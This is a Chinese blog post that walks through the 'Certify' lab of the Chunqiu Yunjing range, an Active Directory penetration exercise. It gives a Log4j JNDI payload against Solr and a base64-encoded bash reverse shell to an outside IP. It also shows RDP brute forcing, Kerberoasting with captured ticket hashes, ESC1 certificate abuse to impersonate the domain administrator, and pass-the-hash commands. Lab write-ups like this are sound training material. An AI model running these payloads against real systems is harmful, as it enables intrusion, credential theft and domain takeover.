

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/null">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="D0G">
  <meta name="keywords" content="">
  
    <meta name="description" content="Certifyflag01信息收集fsacn扫描一下存活端口（其实还有80也开了）  8983为开启log4j的solr 外网打点 solr常见的漏洞是任意文件读取和log4j   1&#x2F;solr&#x2F;admin&#x2F;collections?action&#x3D;$&amp;#123;jndi:ldap:&#x2F;&#x2F;62.234.82.111:1389&#x2F;jgav3g&amp;#125;  直接尝试利用，JNDIExploit,开启ldap">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云镜-Certify">
<meta property="og:url" content="https://blog.cgjue.cn/2025/03/17/Certify/index.html">
<meta property="og:site_name" content="云自无心水自闲">
<meta property="og:description" content="Certifyflag01信息收集fsacn扫描一下存活端口（其实还有80也开了）  8983为开启log4j的solr 外网打点 solr常见的漏洞是任意文件读取和log4j   1&#x2F;solr&#x2F;admin&#x2F;collections?action&#x3D;$&amp;#123;jndi:ldap:&#x2F;&#x2F;62.234.82.111:1389&#x2F;jgav3g&amp;#125;  直接尝试利用，JNDIExploit,开启ldap">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blog.cgjue.cn/img/ctfer4.png#%E4%B8%BB%E9%A1%B5%E5%9B%BE%E7%89%87">
<meta property="article:published_time" content="2025-03-17T06:53:37.000Z">
<meta property="article:modified_time" content="2025-03-17T10:03:45.124Z">
<meta property="article:author" content="D0G">
<meta property="article:tag" content="Solr， AD CS， SMB， Kerberos， 域渗透">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://blog.cgjue.cn/img/ctfer4.png#%E4%B8%BB%E9%A1%B5%E5%9B%BE%E7%89%87">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>春秋云镜-Certify - 云自无心水自闲</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/gradient.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blog.cgjue.cn","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":66,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":100},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="云自无心水自闲" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>👻云自无心水自闲</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>朋友们</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png#%E6%96%87%E7%AB%A0%E9%A1%B6%E9%83%A8') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="春秋云镜-Certify"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-03-17 14:53" pubdate>
          2025年3月17日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          63 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">春秋云镜-Certify</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Certify"><a href="#Certify" class="headerlink" title="Certify"></a>Certify</h1><h2 id="flag01"><a href="#flag01" class="headerlink" title="flag01"></a>flag01</h2><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>fsacn扫描一下存活端口（其实还有80也开了）</p>
<p><img src="/img/image-20250317154207623.png" srcset="/img/loading.gif" lazyload></p>
<p>8983为开启log4j的solr</p>
<h3 id="外网打点"><a href="#外网打点" class="headerlink" title="外网打点"></a>外网打点</h3><blockquote>
<p>solr常见的漏洞是任意文件读取和log4j</p>
</blockquote>
<p><img src="/img/image-20250317154324570.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/solr/</span>admin<span class="hljs-regexp">/collections?action=$&#123;jndi:ldap:/</span><span class="hljs-regexp">/62.234.82.111:1389/</span>jgav3g&#125;<br></code></pre></td></tr></table></figure>

<p>直接尝试利用，<a target="_blank" rel="noopener" href="https://github.com/WhiteHSBG/JNDIExploit">JNDIExploit</a>,开启ldap服务，<del>开启对应端口</del></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 62.234.82.111 -C <span class="hljs-string">&quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82Mi4yMzQuODIuMTExLzk5OTkgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot;</span><br></code></pre></td></tr></table></figure>

<p>推荐一个网站 <a target="_blank" rel="noopener" href="https://ares-x.com/tools/runtime-exec/#/">https://ares-x.com/tools/runtime-exec/#/</a></p>
<p><img src="/img/image-20250317160001929.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">ldap://62.234.82.111:1389/jgav3g<br><span class="hljs-comment"># 打ladp即可</span><br></code></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs http">url/solr/admin/collections?action=$&#123;jndi:ldap://62.234.82.111:1389/jgav3g&#125;<br></code></pre></td></tr></table></figure>

<p>即可拿到shell</p>
<h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h3><p><img src="/img/image-20250317160349119.png" srcset="/img/loading.gif" lazyload></p>
<p>sudo -l 后发现有grc可以利用</p>
<p><img src="/img/image-20250317160529223.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/img/image-20250317160854747.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="flag02"><a href="#flag02" class="headerlink" title="flag02"></a>flag02</h2><h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><p>上传fscan 和frp</p>
<p><img src="/img/image-20250317162055441.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">172.22.9.7</span>  #DC<br><span class="hljs-number">172.22.9.19</span> #solr 已经拿下的机器<br><span class="hljs-number">172.22.9.26</span> # 看名字像个人机器<br><span class="hljs-number">172.22.9.47</span> #fileserver<br></code></pre></td></tr></table></figure>

<p><del>其实还有一台CA 没扫出来？</del></p>
<figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs accesslog"><span class="hljs-number">172.22.9.13</span> #CA<br></code></pre></td></tr></table></figure>



<h3 id="SMB"><a href="#SMB" class="headerlink" title="SMB"></a>SMB</h3><p>172.22.9.47开放了445端口</p>
<p>可能存在smb</p>
<p>测试一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains smbclient //172.22.9.47/fileshare<br></code></pre></td></tr></table></figure>

<p>可以连接，发现存在.db文件</p>
<p>以及secret下的flag</p>
<p>get下来 查看一下personnel.db的内容</p>
<p><img src="/img/image-20250317163426214.png" srcset="/img/loading.gif" lazyload></p>
<p>flag2中有一句</p>
<figure class="highlight actionscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs actionscript">Yes, you have enumerated smb. But <span class="hljs-keyword">do</span> you know what an SPN <span class="hljs-keyword">is</span>?<br></code></pre></td></tr></table></figure>



<h2 id="flag03-04"><a href="#flag03-04" class="headerlink" title="flag03&amp;04"></a>flag03&amp;04</h2><p>发现一些隐藏用户名的密码</p>
<p><img src="/img/image-20250317163722749.png" srcset="/img/loading.gif" lazyload></p>
<p>其他表中又存在用户信息</p>
<p><img src="/img/image-20250317163756121.png" srcset="/img/loading.gif" lazyload></p>
<p>结合起来爆破一下3389</p>
<p>DC CA 个人机器都开了，不过用户名看起来像是个人机器的账密</p>
<p>把members的用户名做个字典 users里的密码也做个字典</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains hydra -L users.txt -P passwd.txt 172.22.9.26 rdp<br></code></pre></td></tr></table></figure>



<p><img src="/img/image-20250317164519700.png" srcset="/img/loading.gif" lazyload></p>
<p>得到</p>
<blockquote>
<p>zhangjian–i9XDE02pLVf<br>liupeng–fiAzGwEMgTY</p>
</blockquote>
<p>但是rdp登录不上去</p>
<blockquote>
<p>Yes, you have enumerated smb. But do you know what an SPN is?</p>
</blockquote>
<h3 id="SPN"><a href="#SPN" class="headerlink" title="SPN"></a>SPN</h3><blockquote>
<p>在内网中，SPN 扫描通过查询向域控服务器执行服务发现。这对于红队而言，可以帮助他们识别正在运行着重要服务的主机，如终端，交换机等。SPN 的识别与发现是 kerberoasting 攻击的第一步。</p>
</blockquote>
<p>SPN 分为两种类型：	<br>一种是注册在活动目录的机器帐户（Computers）下。当一个服务的权限为 Local System 或 Network Service 时，则 SPN 注册在机器帐户（Computers）下。另一种是注册在活动目录的域用户帐户（Users）下，当一个服务的权限为一个域用户时，则 SPN 注册在域用户帐户（Users）下。</p>
<p>也就是可以在域用户的机器上查找到SPN</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs b">proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf<br></code></pre></td></tr></table></figure>



<p><img src="/img/image-20250317165926504.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs crystal"><span class="hljs-variable">$krb</span>5tgs<span class="hljs-variable">$2</span>3<span class="hljs-variable">$*</span>zhangxia<span class="hljs-variable">$XIAORANG</span>.LAB<span class="hljs-variable">$xiaorang</span>.lab/zhangxia*<span class="hljs-variable">$f679b4092dfd70aa8472e791d86aa19</span>0<span class="hljs-variable">$27c366b74f9fb1a990d9e0db84e71ac15eaddee5da2dd02c56568df3f63bd13175a1b036700d876efc51cdbfe491ce40ebce7249f3495aabd22d6d7314876c54320e66bf7a4720a587302fd706f6c0de39dcb3a860ffa889f4d35a08c9811201c84f750a63c7b4f4bbde7b2c5b5919d3fc245191b28664288b4d55f51c87e05a972a4243e0a8840f5f2206e6639ceee04d3fed2538265057d369aff780d72aa3cbed09ae870700ac98af350a7f045a0dc28920c054e4a4df5ca153bd816ea17d150eb780ae63447599128d4025b68665a09e7985ad3f5ed02f8a65db44fd7cdee2f6f8e26ce2e039dfc43962b67107cfa663ed77fe092712054971b6dea0e86efbdb58d16fb4fbdef4a782badd0cd671d2e9c359c4cde5e83c20ca31b94957ede4f488a43be5647811ebdece1a2543d9cc0b85c48b373909a91f998487b92cac7ea232b34d4d5851bad9c7b0fda8ffcd6d7c0e71336d40fa8fbad7e1b31785f11eca17a286edd4c82839a418c1ff34b766a1fa630690b40de72a38d47a2c53fa2188d8490efd4843520f642861f6f8c740bea2e1edf8cff1e44f839be183a392b72590f60b1d0c0b79a1ccc901df4a9fa0f910b50fb0a3dca29931685556449ed8c20cd139dbcfb95301e31fdae777e7135f23c86a41f225aefefb8d7b845b6199a405c9944fec4dc00ab2b485b7966c59877c50d8a30bb082cf9035ba56ce3a30ce81af6187d9b2e2cb1465b7b9813b74741e3a85de40b8f737b4e6a1c6e26daf77b89df6cd9ee295db40fc0494c8d7507460748928fca8bbeb6881f96587248c2d0d52bc363fd260de1c2ba9bef54dda4669a005fa6af9344cdc10e1e0aeb2317a04213abbdfea620b486794651f8e2b4ef46ee4a512e0891d475fcd3d6bfd0b79fa6c440e000cc17915707d7847c73c1b74b72ddecddcb9ffffc4ed60e2e7f184620bf42e3647201b6543d2534a57ce2ba33a3d32750b6b2bf8b358754b3a99fd3fe5f0cd3a214d52aba933f567ec8952790bc9dbdd6a0c4c7c7017c96b0cf53fed6001f077e38d18b47f878644617c97b202e92be4396c19aec841e823b21e55d301ba672652405daeb6c7161b7cf503563bbee2e88528b8eb7066e1b81e661cd5286743dd823d546343572ce78e8db35b0b78b592cfdb87a969a15b9a1370c009efe8e20d8e983997ad3216b528d2cbac1ebb16930d0d29f3b9988b5ee4e762bf61eeb7bf46fd7765cbd7a246c6ae4b77c0467cf36bfccbea761a6ba6c328369acf2b46b5b244097709ba9deed208d3ccdd78117a90da353cc704b220bbb9c0fb18feeabf3b5fe2b3313579ec4ef2a3ab3364701ed2938d272f22853c367b0536e8a82fe988a824bd6f3d297d84491c99195fe6ae2c52b0e0c731ebe4bfe66a5ff86c0ea01daab9522998b65874a7fc22785e7a382d0392ace9732fc1852a3bd6e637e62188bfa054aca30fdbd5cfa3edf45e2891ff939006d6bb1cd566a3dc9a49873f6f3c15aef22b7ba5</span><br><br><span class="hljs-variable">$krb</span>5tgs<span class="hljs-variable">$2</span>3<span class="hljs-variable">$*</span>chenchen<span class="hljs-variable">$XIAORANG</span>.LAB<span class="hljs-variable">$xiaorang</span>.lab/chenchen*<span class="hljs-variable">$a64b579e52409bfdb3bc68269894ee7</span>9<span class="hljs-variable">$98bfb4307f4ccec45b13be10bd43e96d11a3b32b76a82d3ea838f7a5e2c094826efd2641e146949483d71618268caddfa6cacb7d061af0ae68de1034e7421d32031dc2256d397016f24d1598a5ab1e186be9443d61756064e8f0f3ba4bf3abf8759af238e786fa181e71163cea54eee95e45240f7a8d83bc963473f4eb9f54bb8e35627a30ea799180a10bcaa1f3fba08fdc76539fdd321d2b9fc013c41df36ed46d20c8d635c650bdab9f513885b61000af1b423eaecef53442fc86ee1298d65a60c67bb56d87e97a7032daa0b7ee798864be1cfa7a94aa29a125f9b75a7379a5a430431013e73506ad19624eabd0cc106061477e7b019de85439164c45b45f689faa99ca639d5a74c3224f5dfac51060077d6ae06ea99e516162c063f471f3bb2b6c345b18821dba113d86b8fed0a358da0335496734b2bc653257fcf7797f441437eea299964bbbae3151dbc54f5931e5a4c10f1b158e3e1fd0751a8b072b0e982aa0c1fcec27c6834c2c7266df0295f2f6eedc13f601984a4501c1e28dd4426fe613fba899f51c9ab02fbcd3cdeb5b6e8be2c936346e4882c6ca634371040090572afed37c5128d1aea8af82ac7f2a08d02430c950f43c9b373f661696435b99b13d6303f38486575f37d59f56d98044802951e45a9d0193a5b56835b82edb3bfaa3b5c08dd0132b0a0f9fd979b0b0291eaa5e216e7adc37c5d16add9d34acc60231a7bfed49f47db3d41c08e56cd9299b5e12e6ff1c23c300a422f74358fc32e2ab2522a4f9cdd41ac48c8400d887221ee4e61009e997fb242f5523a5380be90f4eabc4060a201afadd44f22f191fff8916f4acc0eb3b5054a2d00c4481ef81d693cdd3708128c86b6acec899fc572b837f0cfcb0bcf1e4c623d119d5908c70fe56aa1132f4a175a2610075be5c01aa254e10760da894c1cb1d3bb6e0de35bca5a821439b185313dca18524fed8919e445986d9d757741d2c72b6fbaaa688e9f08afbd46b80ca8e6290775ba0d1c79486104214526f530f0eeab30cecb5bf02fe9916447d1a3dc907a80c7eae0ce50ea201ac6bd9c41322c9efcb4aab526286fe5ec8580136ad1072d585d535c5f59d4c06208b005f611d9f1a1120663a2146344921055f918a6cb82bd5a0f93f67ec0f84f3feee9ca3bee51863905c7d37f38c5e3ad55debaaa6ea5be96e6509c768e936b29cd1c9b51eb46a4c8fbd2774a75c0a5863e035bd857512883b676259fabdc557cceb9bc21806a0fff540c85f5d601d6aa2eb984f1ba1988f1bab20f0ac5731e0eeda82e3044d93abe6d9dcc3a80347107a366e33a90c79e00afadcea92a3a0e5e099370e308b15f5ae02c2ea290085d8affd36e129ef5d5bd8d3b29d025909737f4bcd83deba92b544b19f12c2edf33394c4e5c679cc6c10d82e5bde5ee3bde175eec3619efcbbc756848281383eec095f2aecc1879433b349297ef480b1328f5ba2d963b54f8ad42cccab3f5ee80b8393fb45acf4dd32da76</span><br><br></code></pre></td></tr></table></figure>

<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-comment"># 保存到pass后使用hashcat爆破</span><br><span class="hljs-attribute">hashcat</span> -m <span class="hljs-number">13100</span> pass rockyou.txt<br></code></pre></td></tr></table></figure>



<p><img src="/img/image-20250317170650194.png" srcset="/img/loading.gif" lazyload></p>
<p>新的用户账密</p>
<blockquote>
<p>xiaorang.lab\zhangxia MyPass2@@6</p>
<p>xiaorang.lab\chenchen @Passw0rd@</p>
</blockquote>
<p>rdp连接一下，什么都没有</p>
<p>想到172.22.9.13 CA域成员机，存在一台证书颁发服务器<br>域渗透中和证书服务器相关的利用有ESC1和ESC8<br>先检查有没证书配置错误<br><a target="_blank" rel="noopener" href="https://github.com/GhostPack/Certify">https://github.com/GhostPack/Certify</a></p>
<p>利用ceriry查询漏洞（最新版kali自带的其实叫certipy-ad）</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains certipy-ad find -u <span class="hljs-string">&#x27;zhangxia@xiaorang.lab&#x27;</span>  -password <span class="hljs-string">&#x27;MyPass2@@6&#x27;</span> -dc-ip 172.22.9.7 -vulnerable -stdout<br></code></pre></td></tr></table></figure>

<p><img src="/img/image-20250317173336293.png" srcset="/img/loading.gif" lazyload></p>
<p>存在ESC1</p>
<h3 id="ESC1"><a href="#ESC1" class="headerlink" title="ESC1"></a>ESC1</h3><blockquote>
<p>ESC1利用前提条件：</p>
<ul>
<li><strong>msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT</strong><br>表示基于此证书模板申请新证书的用户可以为其他用户申请证书，即任何用户，包括域管理员用户</li>
<li><strong>PkiExtendedKeyUsage: Client Authentication</strong><br>表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证</li>
<li><strong>Enrollment Rights: NT Authority\Authenticated Users</strong><br>表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书</li>
</ul>
</blockquote>
<p><img src="/img/image-20250317173710015.png" srcset="/img/loading.gif" lazyload></p>
<p>申请 XR Manager 证书模版并伪造域管理员，得到administrator.pfx,然后利用administrator.pfx证书获取 TGT 和 NTLM Hash</p>
<p>添加<code>-dc-ip 172.22.9.7</code>不然会出现</p>
<p><img src="/img/image-20250317173946933.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains certipy-ad req -u <span class="hljs-string">&#x27;zhangxia@xiaorang.lab&#x27;</span> -p <span class="hljs-string">&#x27;MyPass2@@6&#x27;</span> -target 172.22.9.7 -dc-ip 172.22.9.7 -ca <span class="hljs-string">&#x27;xiaorang-XIAORANG-DC-CA&#x27;</span> -template <span class="hljs-string">&#x27;XR Manager&#x27;</span> -upn <span class="hljs-string">&#x27;administrator@xiaorang.lab&#x27;</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/image-20250317174116895.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7<br></code></pre></td></tr></table></figure>



<p><img src="/img/image-20250317174144561.png" srcset="/img/loading.gif" lazyload></p>
<p>拿到hash</p>
<figure class="highlight sml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sml"><span class="hljs-symbol">&#x27;administrator</span>@xiaorang.lab&#x27;: aad3b435b51404eeaad3b435b51404ee:<span class="hljs-number">2</span>f1b57eefb2d152196836b0516abea80<br></code></pre></td></tr></table></figure>

<p>hash传递即可</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains crackmapexec smb 172.22.9.26 -u administrator -H  2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x <span class="hljs-string">&quot;type Users\Administrator\flag\flag03.txt&quot;</span><br></code></pre></td></tr></table></figure>



<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">proxychains crackmapexec smb 172.22.9.7 -u administrator -H  2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x <span class="hljs-string">&quot;type Users\Administrator\flag\flag04.txt&quot;</span><br></code></pre></td></tr></table></figure>






                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C/" class="category-chain-item">春秋云镜</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Solr%EF%BC%8C-AD-CS%EF%BC%8C-SMB%EF%BC%8C-Kerberos%EF%BC%8C-%E5%9F%9F%E6%B8%97%E9%80%8F/" class="print-no-link">#Solr， AD CS， SMB， Kerberos， 域渗透</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/03/17/Delegation/" title="春秋云镜-Delegation">
                        <span class="hidden-mobile">春秋云镜-Delegation</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
